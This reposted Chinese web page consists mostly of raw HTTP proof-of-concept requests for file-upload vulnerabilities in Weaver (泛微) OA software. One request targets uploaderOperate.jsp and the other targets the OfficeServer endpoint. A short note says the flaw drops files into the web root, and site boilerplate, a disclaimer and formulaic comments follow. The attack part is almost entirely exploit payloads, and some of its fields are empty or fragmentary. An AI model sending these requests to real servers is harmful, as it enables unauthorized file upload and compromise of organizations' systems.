POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"
------WebKitFormBoundarymVk33liI64J7GQaK—
泛微
OA /defaultroot/officeserverservlet
:确认为历史漏洞;
详情:
/officeserverservlet
路径文件上传
>
将文件释放至跟网站根路径下 在数据包中将
fileid
替换
POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"
{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK—
来源:https://www.linuxlz.com/
------本页内容已结束,喜欢请分享------
感谢您的来访,获取更多精彩文章请收藏本站。
©
版权声明
文章版权声明
1
本网站名称:
子云社区
2
本站永久网址:
www.zilyun.com
3
本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
4
本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报。
5
本站资源售价只是赞助,收取费用仅维持本站的日常运营所需,并且本站不提供任何技术支持!
6
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系
[email protected]
7
根据《计算机软件保护条例》第十七条,本站所有软件、程序请仅用于学习研究用途 ,切勿用于商业用途或非法用途。
8
本站仅为转载分享,不提供任何上传下载服务,所有内容均来自互联网第三方分享站点所提供的公开引用内容。更多查阅
《免责声明》
THE END
喜欢就支持一下吧
三王 9月13日 10:01
0
文章不错,感谢作者分享!杨的 9月12日 10:01
0
文章不错,感谢作者分享!的张 9月8日 10:01
0
受益匪浅,感谢子云提供的平台。市角 9月7日 10:01
0
受益匪浅,感谢子云提供的平台。卡的 9月5日 10:01
0
作者太厉害了,这篇文章我喜欢666!撒惨 9月5日 10:01
0
受益匪浅,感谢子云提供的平台。的宇 9月4日 10:01
0
终于找到组织了,堪比全网最全虚死 9月2日 10:01
0
文章来自大自然的灵感,好喜欢这篇文章。